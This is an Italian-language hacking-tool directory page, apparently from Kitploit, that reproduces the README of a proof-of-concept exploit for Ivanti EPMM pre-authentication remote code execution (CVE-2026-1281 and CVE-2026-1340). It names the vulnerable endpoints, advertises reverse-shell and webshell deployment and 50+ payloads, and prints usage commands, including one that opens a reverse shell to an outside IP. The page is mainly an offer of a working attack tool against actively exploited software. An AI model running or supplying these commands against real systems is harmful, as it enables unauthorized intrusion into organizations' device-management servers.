Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — Proof of Concept per CVE-2026-1281 e CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE tramite Bash Arithmetic Expansion | Kitploit
Strumenti/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

Proof of Concept per CVE-2026-1281 e CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE tramite Bash Arithmetic Expansion

Vedi Repository
61238 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE

License Python CVSS

⚠️ DISCLAIMER: Questo PoC è fornito esclusivamente a scopo educativo e di ricerca sulla sicurezza. L'utilizzo senza autorizzazione esplicita è illegale.

🎯 Descrizione

Proof of Concept (PoC) completo per lo sfruttamento delle vulnerabilità CVE-2026-1281 e CVE-2026-1340 che interessano Ivanti Endpoint Manager Mobile (EPMM). Queste vulnerabilità consentono l'esecuzione di codice arbitrario da remoto (RCE) senza autenticazione tramite un meccanismo di Bash Arithmetic Expansion.

Vulnerabilità

  • CVE-2026-1281 : Iniezione di codice nell'endpoint /mifs/c/appstore/fob/
  • CVE-2026-1340 : Iniezione di codice nell'endpoint /mifs/c/aftstore/fob/
  • Punteggio CVSS : 9.8 (Critical)
  • Sfruttamento : Attivo in-the-wild (Zero-Day)

🚀 Funzionalità

  • ✅ Framework di validazione automatizzato (8 test)
  • ✅ Sfruttamento Pre-Auth RCE
  • ✅ Reverse shell automatico
  • ✅ Distribuzione di webshell
  • ✅ 50+ payload pronti all'uso
  • ✅ Script di rilevamento per Blue Team
  • ✅ Documentazione completa

📦 Installazione

git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py

🎯 Utilizzo Rapido

# Test di vulnerabilità
python3 exploit.py -t https://target.com -c

# Validazione RCE
python3 exploit.py -t https://target.com --test-rce

# Reverse shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444

📚 Documentazione

  • README completo - Documentazione tecnica dettagliata
  • Guida all'utilizzo - Guida passo passo
  • Payload - Collezione di 50+ payload
  • Guida Red Team - Scenari operativi

🔗 Riferimenti

  • CERT-FR CERTFR-2026-ALE-001
  • Watchtowr Labs Analysis
  • CVE-2026-1281
  • CVE-2026-1340

👤 Autore

Mehdi Le Deaut - Consulente Cybersecurity | Specialista Red Team

LinkedIn

⚖️ Licenza

Questo progetto è concesso in licenza MIT - vedere il file LICENSE per maggiori dettagli.

🙏 Ringraziamenti

  • CERT-FR per l'allerta tempestiva
  • Watchtowr Labs per l'analisi tecnica
  • La comunità della cybersecurity
Scarica lo strumento